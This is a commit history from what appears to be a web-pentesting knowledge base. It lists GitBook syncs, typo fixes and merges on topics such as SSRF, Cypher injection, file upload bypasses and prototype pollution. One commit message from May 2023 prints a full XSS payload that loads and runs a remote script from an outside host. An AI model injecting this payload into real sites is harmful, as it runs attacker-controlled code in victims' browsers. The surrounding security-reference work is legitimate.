Commit graph

1014 commits

Author SHA1 Message Date
Eferus
a3d91ce362
Reorganize Domain Confusion list in SSRF
* Remove duplicates
* Add payloads
2023-05-06 04:28:16 +02:00
Matthew Prain
ac9e066bb6
Add missing HTML form methods for POST exploits
"Form POST request" and "Form POST request through iframe" now have the correct POST method.
2023-05-05 10:24:18 +10:00
CPol
c469ce05ac
GITBOOK-3892: change request with no subject merged in GitBook 2023-05-04 23:22:39 +00:00
syselement
3ed41d5e00
Update README.md - SQLMap CheatSheet 2023-05-04 19:19:54 +02:00
bl13bl03p
4916da0f6e
Completed payload
Location: Line 896
Change: Added > to complete payload

`<img src=1 onerror="s=document.createElement('script');s.src='http://xss.rocks/xss.js';document.body.appendChild(s);">`
2023-05-03 19:27:46 +02:00
CPol
504234542f
GITBOOK-3885: change request with no subject merged in GitBook 2023-04-30 22:29:45 +00:00
CPol
ecd03d0108
GITBOOK-3884: change request with no subject merged in GitBook 2023-04-30 21:54:03 +00:00
CPol
98facb9725
GITBOOK-3883: change request with no subject merged in GitBook 2023-04-30 21:23:47 +00:00
TomFox
86fd85255e
Update cypher-injection-neo4j.md 2023-04-27 12:03:10 +02:00
KeoOp
f034eb35f1
fix a missing space in a cypher-injection payload
fix a missing space in url in cypher-injection-neo4j.md
2023-04-27 11:24:52 +08:00
Carlos Polop
e36ebc6dee
Merge pull request #616 from fssecur3/patch-1
Add special character to bypass file upload restrictions
2023-04-26 15:52:36 +02:00
carlospolop
5ec5b67e79 update twitter 2023-04-25 20:35:28 +02:00
CPol
34c27bc4e1
GITBOOK-3879: change request with no subject merged in GitBook 2023-04-18 23:46:39 +00:00
Francisco Spínola
0aefd22b53
Add special character to bypass file upload restrictions 2023-04-11 14:20:39 +01:00
CPol
b5069b5f86
GITBOOK-3870: change request with no subject merged in GitBook 2023-04-11 01:00:47 +00:00
Francisco Spínola
6a7fb5e4f4
Add special character to bypass file upload restrictions 2023-04-10 17:55:08 +01:00
carlospolop
286ea6a24c hacktricks cloud 2023-04-07 10:52:01 +02:00
CPol
cc9b5b1abb
GITBOOK-3867: change request with no subject merged in GitBook 2023-04-06 15:39:43 +00:00
CPol
6046750cc2
GITBOOK-3866: change request with no subject merged in GitBook 2023-04-06 10:05:52 +00:00
CPol
608d71d4a6
GITBOOK-3864: change request with no subject merged in GitBook 2023-04-05 23:11:20 +00:00
carlospolop
2197a2102f f 2023-04-05 17:19:27 +02:00
CPol
c3d99d5e4f
GITBOOK-3863: change request with no subject merged in GitBook 2023-04-05 15:16:57 +00:00
carlospolop
1fa9f77ec3 change 2023-04-05 14:02:54 +02:00
OxNinja
fbb21ead23
Fix wfuzz typos
Fixed some minor typos at /pentesting-web/web-tool-wfuzz.md
2023-03-31 13:56:52 +02:00
CPol
9687d27a38
GITBOOK-3851: change request with no subject merged in GitBook 2023-03-30 22:05:38 +00:00
CPol
221c5f2ad6
GITBOOK-3846: change request with no subject merged in GitBook 2023-03-29 15:51:50 +00:00
CPol
b68d444c7e
GITBOOK-3842: change request with no subject merged in GitBook 2023-03-28 22:07:13 +00:00
CPol
4e9432ed74
GITBOOK-3840: change request with no subject merged in GitBook 2023-03-28 17:50:22 +00:00
CPol
bfb02053d9
GITBOOK-3838: change request with no subject merged in GitBook 2023-03-28 11:38:04 +00:00
CPol
dee4c5fa4e
GITBOOK-3836: change request with no subject merged in GitBook 2023-03-28 10:15:00 +00:00
Carlos Polop
8a22e8590c
Merge pull request #611 from blacklanternsecurity/badsecrets
Badsecrets
2023-03-27 11:42:50 +02:00
Carlos Polop
b54069ccaf
Merge pull request #610 from Swiftrix/Swiftrix-patch-1
Update prototype-pollution-to-rce.md
2023-03-27 11:41:01 +02:00
Carlos Polop
57a6a58b47
Merge pull request #606 from blacklanternsecurity/master
BBOT for bucket enumeration, subdomain takeover
2023-03-27 11:38:20 +02:00
Carlos Polop
9c58a361bd
Merge pull request #604 from petersandor/fix/typo-beginning
fix: typos
2023-03-27 11:36:43 +02:00
liquidsec
2f41f6baba typo fix 2023-03-25 12:47:16 -04:00
liquidsec
15756038b3 small language adjustment 2023-03-24 17:55:50 -04:00
liquidsec
d7eb3427c4 adding references to badsecrets 2023-03-24 17:40:35 -04:00
Swiftrix
ee145f556a
Update prototype-pollution-to-rce.md 2023-03-24 16:40:07 +00:00
CPol
eeeeb2fb0a
GITBOOK-3834: No subject 2023-03-23 15:12:27 +00:00
CPol
cb84a845ff
GITBOOK-3832: No subject 2023-03-23 14:15:27 +00:00
CPol
a8258ea313
GITBOOK-3830: No subject 2023-03-23 14:03:29 +00:00
CPol
f1728eac7d
GITBOOK-3829: No subject 2023-03-23 12:54:51 +00:00
CPol
ceb09f11fe
GITBOOK-3828: No subject 2023-03-23 12:48:36 +00:00
TheTechromancer
0db8cb0492 BBOT for bucket enumeration, subdomain takeover 2023-03-21 17:10:11 -04:00
CPol
3caaafe0b0
GITBOOK-3826: No subject 2023-03-20 09:22:01 +00:00
Peter Šándor
92d821c204
fix: typos 2023-03-19 19:16:17 +01:00
CPol
0350723c81
GITBOOK-3824: No subject 2023-03-15 09:29:52 +00:00
CPol
3af1f60237
GITBOOK-3823: No subject 2023-03-14 23:16:58 +00:00
CPol
6b22eab3d2
GITBOOK-3820: No subject 2023-03-12 18:00:45 +00:00
dxbstyle
0bc3981364
Typo
flile.phpJunk123png -> file.phpJunk123png
2023-03-11 20:44:03 +01:00
CPol
94e9127a8d
GITBOOK-3819: No subject 2023-03-05 23:41:46 +00:00
carlospolop
f0e09e3f54 social 2023-03-06 00:16:20 +01:00
carlospolop
9e5102b4c0 social 2023-03-06 00:15:43 +01:00
CPol
bb1f6e0b75
GITBOOK-3817: No subject 2023-03-05 22:20:47 +00:00
carlospolop
89016342d8 f 2023-03-05 22:38:33 +01:00
carlospolop
bee65ef8c6 twit 2023-03-05 20:58:55 +01:00
CPol
675802d483
GITBOOK-3816: No subject 2023-03-05 19:54:13 +00:00
carlospolop
d0476b922d d 2023-03-05 19:35:39 +01:00
CPol
a6c260e567
GITBOOK-3814: No subject 2023-03-05 18:28:55 +00:00
carlospolop
77801de4cf fix 2023-03-05 19:27:55 +01:00
CPol
a67c417bb8
GITBOOK-3813: No subject 2023-03-05 18:12:38 +00:00
CPol
df3103dbf8
GITBOOK-3812: No subject 2023-03-05 15:13:44 +00:00
CPol
7bfac801c5
GITBOOK-3809: No subject 2023-03-05 10:15:19 +00:00
Carlos Polop
19bc061f46
Merge pull request #594 from maxence-Doyensec/FileUploadUWSGI
file upload to RCE using uwsgi.ini
2023-03-05 11:06:08 +01:00
Carlos Polop
5ad193d1b8
Merge pull request #592 from FreeZeroDays/master
Fixing Cache Deception Typo
2023-03-05 10:59:00 +01:00
CPol
3a122edb7d
GITBOOK-3806: No subject 2023-03-04 19:33:37 +00:00
CPol
fb8562b7c0
GITBOOK-3805: No subject 2023-03-04 19:17:01 +00:00
CPol
595f9f77db
GITBOOK-3804: No subject 2023-03-03 17:26:17 +00:00
CPol
f8a5c782d0
GITBOOK-3803: No subject 2023-03-03 16:32:17 +00:00
CPol
2d8221606b
GITBOOK-3802: No subject 2023-03-03 16:14:19 +00:00
CPol
72062e8323
GITBOOK-3801: No subject 2023-03-03 15:56:05 +00:00
CPol
0d24e9705b
GITBOOK-3800: No subject 2023-03-03 15:39:23 +00:00
CPol
ac9c37e960
GITBOOK-3799: No subject 2023-03-03 00:11:57 +00:00
CPol
549fae7260
GITBOOK-3798: No subject 2023-03-02 18:08:43 +00:00
Maxence Schmitt
f38b063a3d file upload to RCE using uwsgi.ini 2023-03-02 10:08:19 +01:00
CPol
4ced3c152d
GITBOOK-3796: No subject 2023-03-01 10:14:57 +00:00
parzival
7d4d854a2e
Fixing Cache Deception Typo
Fixing a small typo as it confused my understanding while revising Web Cache Deception attacks. Namely, where an attacker would observe the sensitive cached information after social engineering a user.
2023-02-28 22:11:38 -08:00
CPol
b399cad65f
GITBOOK-3794: No subject 2023-02-27 18:21:24 +00:00
carlospolop
efa1552937 link 2023-02-27 11:02:29 +01:00
carlospolop
3edf173026 hp 2023-02-27 10:54:26 +01:00
carlospolop
4f3092e61d hp 2023-02-27 10:28:45 +01:00
CPol
da094e016f
GITBOOK-3792: No subject 2023-02-23 14:32:10 +00:00
CPol
c1cccba14b
GITBOOK-3791: No subject 2023-02-20 18:01:10 +00:00
CPol
051dd65e8b
GITBOOK-3790: No subject 2023-02-20 09:58:12 +00:00
CPol
5d64cb46c6
GITBOOK-3789: No subject 2023-02-19 18:39:32 +00:00
CPol
f944a3c8d3
GITBOOK-3788: No subject 2023-02-16 18:26:56 +00:00
CPol
20f2f4d00e
GITBOOK-3787: No subject 2023-02-16 16:03:36 +00:00
CPol
a29bf55e79
GITBOOK-3784: No subject 2023-02-16 13:50:15 +00:00
CPol
c9c610f987
GITBOOK-3783: No subject 2023-02-16 13:29:30 +00:00
CPol
314bdaef36
GITBOOK-3782: No subject 2023-02-16 12:43:10 +00:00
CPol
d97b2eac72
GITBOOK-3781: No subject 2023-02-15 11:31:27 +00:00
CPol
39f0ec914e
GITBOOK-3777: No subject 2023-02-14 11:55:05 +00:00
carlospolop
11c30b864a hackenproof link 2023-02-14 12:23:00 +01:00
CPol
545ef9a112
GITBOOK-3776: No subject 2023-02-10 15:56:22 +00:00
CPol
15b11b2b73
GITBOOK-3775: No subject 2023-02-10 15:50:09 +00:00
CPol
003c985633
GITBOOK-3774: No subject 2023-02-10 12:30:22 +00:00
CPol
9d1fb726ff
GITBOOK-3772: No subject 2023-02-09 23:44:03 +00:00
CPol
ad00b9f0f4
GITBOOK-3771: No subject 2023-02-07 23:15:13 +00:00
CPol
6456c7762e
GITBOOK-3770: No subject 2023-02-07 10:56:16 +00:00
CPol
d72f44f462
GitBook: [#3766] No subject 2023-01-25 11:53:16 +00:00